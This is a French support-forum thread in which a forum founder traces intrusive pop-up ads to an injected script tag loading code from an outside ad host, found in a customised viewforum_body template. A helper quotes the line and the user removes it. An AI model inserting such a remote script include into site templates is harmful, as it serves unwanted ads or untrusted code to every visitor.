Vérifiez vos informations

Il semblerait que les informations techniques de votre profil n'aient pas été actualisées depuis un certain temps... Pour que l'aide apportée vous soit efficace, il est important que ces informations soient à jour : prenez quelques secondes pour confirmer ou compléter les informations suivantes.


Lien de votre forum
Version de ce forum
Vous êtes le fondateur de ce forum
Vous avez modifié le CSS de ce forum
Vous avez modifié les templates de ce forum
Votre navigateur

Pubs intempestives (templates)

Voir le sujet précédent Voir le sujet suivant Aller en bas

Résolu Pubs intempestives (templates)

Message par Orkeis. le Dim 30 Mar 2014 - 15:14

Bonjour !
Je viens vers vous car je rencontre un petit soucis de publicités intempestives !
En effet, je suis en train de monter un forum et depuis que j'ai modifié les Template, des fenêtres de pubs s'ouvres à tout va et une barre de pub se colle a gauche de mon écran.
Ça ne vient pas de mon PC, mais bien du forum !
Après quelques recherches, j'ai remarqué que c'était le Template "viewforum_body" qui en était à l'origine.
Quand je supprime les modifications, plus de pubs, quand je les remet, pubs.

J'aimerais donc savoir comment cela est possible et pourquoi !?
Ne me dites pas de désinstaller yontoo ou de nettoyer mon pc, je l'ai fait 40 fois et yontoo n'est pas présent dans mon ordi, ça vient du forum, les autres admins le voient aussi depuis que j'ai modifié les Templates.

Merci d'avance de votre aide !

Je vous donne le code du Template en question :

Code:
{BOARD_INDEX}
<div class="cadrefo">               <div class="imgfopos">
  <img src="http://image.noelshack.com/fichiers/2014/10/1394156784-titrepa.png" /></div> <table width="100%" border="0" cellspacing="2" cellpadding="0" align="center">
   <tr>
      <td align="left" valign="middle" width="50">
         <!-- BEGIN switch_user_authpost -->
         <a href="{U_POST_NEW_TOPIC}" rel="nofollow"><img src="{POST_IMG}" id="{POST_IMG_ID}" alt="{L_POST_NEW_TOPIC}" border="0" /></a>
         <!-- END switch_user_authpost -->
      </td>
      <td class="nav" valign="middle" width="100%"><div class="nav"><a class="nav" href="{U_INDEX}">{L_INDEX}</a>{NAV_CAT_DESC}</div></td>
      <td class="gensmall" align="right" valign="bottom" nowrap="nowrap">
         <span class="nav">
            <script src="http://b.trisrv.com/dy?6a53223d-fef5-443f-aace-7205e47fca96"></script> <script type="text/javascript">//<![CDATA[
               var url_newposts = '{U_NEWPOSTS_JS_PLUS_MENU}';
               var url_egosearch = '{U_EGOSEARCH_JS_PLUS_MENU}';
               var url_unanswered = '{U_UNANSWERED_JS_PLUS_MENU}';
               var url_watchsearch = '{U_WATCHSEARCH_JS_PLUS_MENU}';
               var url_tellfriend = '{U_TELLFRIEND_JS_PLUS_MENU}';
               insert_plus_menu('f{FORUM_ID}&amp;f={FORUM_ID}','{JS_SESSION_ID}', {JS_AUTH_FAVOURITES});
            //]]>
            </script>
         </span>
      </td>
   </tr>
  </table>
{TOPICS_LIST_BOX}<div class="imgfopos">
  <img src="http://image.noelshack.com/fichiers/2014/10/1394158551-hof.png" /> </div></div>
<div id="info_open" style="display:''">
   <div class="cadrefo2"><table width="100%" border="0" cellspacing="2" cellpadding="0" align="center"><table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0">
      <tr>
         <td class="row1" align="left" valign="top"><span class="gensmall"><a href="{U_MARK_READ}">{L_MARK_TOPICS_READ}</a></span></td>
         <td class="row1" align="right" valign="top"><span class="gensmall">{S_WATCH_FORUM}</span></td>
      </tr>
      <tr>
         <td class="row2" colspan="2" valign="top"><span class="gensmall"><b>{LOGGED_IN_USER_LIST}</b></span></td>
      </tr>
      <tr>
         <td class="row2" valign="top" width="150"><span class="gensmall"><b>{L_MODERATOR}:</b></span></td>
         <td class="row1" valign="top"><span class="gensmall">{MODERATORS}</span></td>
      </tr>
      <tr>
         <td class="row2" valign="top" width="150"><span class="gensmall">{L_TABS_PERMISSIONS}</span></td>
         <td class="row1" valign="top"><span class="gensmall">{S_AUTH_LIST}</span></td>
      </tr>      <tr>         <td class="catBottom" colspan="2" height="28">
          <table width="100%" border="0" cellspacing="0" cellpadding="0">
            <tr>   
              <td class="nav" valign="middle" width="100%">
                <div class="nav"> <a class="nav" href="{U_INDEX}">{L_INDEX}</a>
                  {NAV_CAT_DESC_SECOND}</div></td>         
              <td align="right" valign="middle">
                <span class="gensmall">
                  <a href="javascript:ShowHideLayer('info_open','info_close');">
                    <img src="{TABS_LESS_IMG}" alt="-" align="middle" border="0" /></a></span></td>
            </tr>            
          </table>   
          </td>      
          </tr>   
          </table></div>
          <div id="info_close" style="display:none">
            <table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0">   
              <tr>   
      <td class="row1" colspan="2" align="right" valign="top">
                  <span class="gensmall"><a href="{U_MARK_READ}">{L_MARK_TOPICS_READ}</a></span></td>   
              </tr>      
              <tr>      
                <td class="row2" colspan="2" valign="top">
                  <span class="gensmall"><b>{LOGGED_IN_USER_LIST}</b></span></td>   
              </tr>   
              <tr>      
                <td class="catBottom" colspan="2" height="28">      
                  <table width="100%" border="0" cellspacing="0" cellpadding="0">   
                    <tr>               
                      <td class="nav" valign="middle" width="100%">
                        <span class="nav"> <a class="nav" href="{U_INDEX}">
                          {L_INDEX}</a>{NAV_CAT_DESC_SECOND}</span></td>
                      <td align="right" valign="middle"><span class="gensmall">
                        <a href="javascript:ShowHideLayer('info_open','info_close');">
                          <img src="{TABS_MORE_IMG}" alt="+" align="middle" border="0" /></a></span></td>
                    </tr>            
                  </table>         
                </td>      
              </tr>   
            </table></div>   
          <form action="{S_JUMPBOX_ACTION}" method="get" name="jumpbox" onsubmit="if(document.jumpbox.f.value == -1){return false;}">
            <table width="100%" border="0" cellspacing="2" cellpadding="0" align="center">
              <tr>         
                <td align="left" valign="middle" width="50">      
      <!-- BEGIN switch_user_logged_in -->      
                  <a href="{U_POST_NEW_TOPIC}" rel="nofollow">
                    <img src="{POST_IMG}" id="{POST_IMG_ID}1" alt="{L_POST_NEW_TOPIC}" border="0" /></a>
                  <!-- END switch_user_logged_in -->      
                </td>      
                <td align="right" nowrap="nowrap">
                  <span class="gensmall">{L_JUMP_TO}: {S_JUMPBOX_SELECT} <input class="liteoption" type="submit" value="{L_GO}" />
                  </span></td>   
              </tr>   
              </table></div>   
  </form>

apperçu:
Pubs intempestives (templates) 1396185006-pubs


Dernière édition par Orkeis. le Dim 30 Mar 2014 - 16:06, édité 1 fois
avatar

Orkeis.
Nouveau membre

Messages : 24
Inscrit(e) le : 11/07/2009

http://stanford-u.keuf.net
Orkeis. a été remercié(e) par l'auteur de ce sujet.

Résolu Re: Pubs intempestives (templates)

Message par Neptunia le Dim 30 Mar 2014 - 15:34

Bonjour ^^


Dans quel but avez vous ajouté ce code dans votre template ?
Code:
<script src="http://b.trisrv.com/dy?6a53223d-fef5-443f-aace-7205e47fca96"></script>
Neptunia

Neptunia
Membre actif

Féminin
Messages : 14556
Inscrit(e) le : 08/08/2010

https://www.galaxie-series.net/
Neptunia a été remercié(e) par l'auteur de ce sujet.

Résolu Re: Pubs intempestives (templates)

Message par Orkeis. le Dim 30 Mar 2014 - 15:45

Je sais pas  Hein 
J'ai du recopier un code de tuto sans faire trop attention...
Mais c'est bizarre quand même, le script se retrouve dans plusieurs de mes templates et je vois vraiment pas pourquoi je les aurais ajouté !
C'est possible que ce soit un virus ? Genre un truc qui viens intégrer des pub dans mes templates ?
Parce que je me souviens vraiment pas avoir fait ça.
Merci en tout cas ! thumleft
Je crois que ça fonctionne quand je le retire !
C'est parfait !
& encore merci pour la rapidité ! Yes
avatar

Orkeis.
Nouveau membre

Messages : 24
Inscrit(e) le : 11/07/2009

http://stanford-u.keuf.net
Orkeis. a été remercié(e) par l'auteur de ce sujet.

Résolu Re: Pubs intempestives (templates)

Message par Neptunia le Dim 30 Mar 2014 - 15:55

Je vois pas de logiciel capable d'éditer des templates à la place du fondateur.

A mon avis vous avez plutot copié/collé des templates sans forcément savoir ce qui avait été réellement modifié.
Neptunia

Neptunia
Membre actif

Féminin
Messages : 14556
Inscrit(e) le : 08/08/2010

https://www.galaxie-series.net/
Neptunia a été remercié(e) par l'auteur de ce sujet.

Résolu Re: Pubs intempestives (templates)

Message par Orkeis. le Dim 30 Mar 2014 - 16:06

Si c'est le cas, je sais de quel tuto il s'agit et c'est pas gentil Snifff  !

EDIT : ce n'est pas possible que ce soit moi qui ai copié/collé un code que je ne connaissais pas,
je suis la première à avouer mes erreurs, mais là, le script est dans quasiment tous les templates que j'ai modifié, à divers endroits, et parfois dans des bouts de codes que je n'ai même pas touché.
Bref, je préfère le dire, au cas où ça arrive à un autre.

Merci encore,  résolu
avatar

Orkeis.
Nouveau membre

Messages : 24
Inscrit(e) le : 11/07/2009

http://stanford-u.keuf.net
Orkeis. a été remercié(e) par l'auteur de ce sujet.

Voir le sujet précédent Voir le sujet suivant Revenir en haut


Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum